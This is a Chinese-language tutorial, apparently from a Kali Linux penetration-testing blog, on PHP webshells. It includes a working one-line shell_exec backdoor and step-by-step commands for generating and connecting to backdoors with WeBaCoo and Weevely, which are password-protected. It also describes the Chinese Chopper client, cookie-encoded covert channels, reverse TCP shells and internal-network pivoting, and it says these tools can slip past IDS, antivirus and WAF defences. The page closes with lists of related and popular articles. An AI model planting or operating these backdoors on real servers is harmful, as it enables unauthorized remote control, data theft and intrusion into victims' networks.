• 之前我们介绍过一句话的webshell
<?php echo shell_exec($_GET['cmd']);?>
  • 中国菜刀

  • 可能被IDS、AV、WAF、扫描器软件发现查杀

中国菜刀

  • 下载好了之后,复制这个代码去服务器

  • 之后运行客户端程序并添加服务器地址

  • 然后双击就可以正常连接了

WeBaCoo(Web Backdoor Cookie)

  • 类终端的shell

  • 编码通信内容通过cookie头传输,隐蔽性较强

  • cm:base64编码的命令

  • cn:服务器用于返回数据

  • cp:返回信息定界符

生成服务端

webacoo -g -o a.php

客户端去连接,可以正常连接;

webacoo -t -u http://IP/a.php

  • 当然他还有其他很多的命令,自己去试试把

Weevely

  • 隐蔽的类终端PHP Webshell

  • 30多个管理模块

  • 执行系统命令、浏览文件系统

  • 检查服务器常见配置错误

  • 创建正向、反向TCP SHELL连接

  • 通过目标计算机代理HTTP流量

  • 从目标计算机进行端口扫描,渗透内网

  • 支持连接密码

首先需要安装一下库文件

  • 首先访问这个网站https://pypi.python.org/pypi/PySocks/

  • 之后解压出来,然后./setup.py install

  • 生成服务端并传入至服务器中
weevely generate 123456 wee.php    (132456为连接密码)

  • 之后可以连接了
weevely http://192.168.0.119/wee.php 123456 (123456就是设置的密码)

  • 当然还有很多的可利用模块,大家可以试试

Kali渗透测试_WebShell相关推荐

  1. Kali渗透测试-远程控制:6200端口变成“后门”

    Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...

  2. Kali渗透测试:使用Armitage针对漏洞进行攻击

    Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...

  3. Kali渗透测试:使用browser_autopwn2模块进行渗透攻击

    Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...

  4. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  5. Kali渗透测试:网络数据的嗅探与欺骗

    Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...

  6. 学习Kali渗透测试笔记

    Kali渗透测试 一.什么是渗透测试 1. 软件测试 2. 安全测试与渗透测试 3.渗透测试 二.渗透测试的目标 1. 网络硬件设备 2. 主机操作系统 3. 应用系统 4. 数据库系统 三.渗透测试 ...

  7. Kali渗透测试:身份认证攻击

    Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...

  8. kali渗透测试实战操作

    Kali渗透测试复现 所需环境 所需环境 Vmware Kali Linux(IP:192.168.145.128) Windows 7 or Windows 10 打开终端,输入msfconsole ...

  9. ​kali渗透测试环境搭建

    推荐阅读 ​kali渗透测试环境搭建 https://m.weishi100.com/mweb/series/?id=1373351 https://m.weishi100.com/mweb/seri ...

最新文章

  1. BZOJ4668: 冷战 [并查集 按秩合并]
  2. Expression Blend 5 Preview For Silverlight5 RC已发布
  3. 设计模式:中介者模式(Mediator)
  4. LightGBM——提升机器算法(图解+理论+安装方法+python代码)
  5. tomcat使用遇到的问题汇总
  6. 用Veritas制作MSI文件,Active Directory系列之二十四
  7. html文件转成base64字符串,js 转base64字符串为文件
  8. 函数编程(Functional programming)
  9. FPGA 实现 RGB 图像转 Gray
  10. atitit.客户端连接oracle数据库的方式总结
  11. ai驱动数据安全治理_利用AI驱动的自动协调器实时停止有毒信息
  12. 国家集训队论文分类整理[转]
  13. 计算机组成原理资料(选择题)
  14. App架构师实践指南四之性能优化一
  15. 家用 NAS 服务器搭建 | 网络 | DNS域名解析
  16. 动态磁盘和基本磁盘的区别
  17. Redis分布式锁背后的原理
  18. 写了2年文章的我,昨天第一次露脸直播。
  19. 五十岁后肌肉衰减,力量下降?男性想要恢复力量应该怎么做?
  20. 语音用户累计破1.4亿!百度AI地图成智能交通基础设施

热门文章

  1. 网络编程(网络基础、套接字Socket、数据报Datagram及其常用方法)
  2. Navicat for MySQL 数据库应用 (三)
  3. 两招小办法对付宝宝发烧、咳嗽。超级管用哈
  4. Kotlin 关于 REPL交互式编程命令行 运行kts报错问题
  5. 重定向dup和dup2
  6. 企业再造(Re-engineering)(转载)
  7. [文献阅读] Sparsity in Deep Learning: Pruning and growth for efficient inference and training in NN
  8. h3c s5130交换机配置vlan和telnet服务
  9. 虚幻引擎获取bilibili直播间弹幕插件的使用教程
  10. Pytorch纯新手入门笔记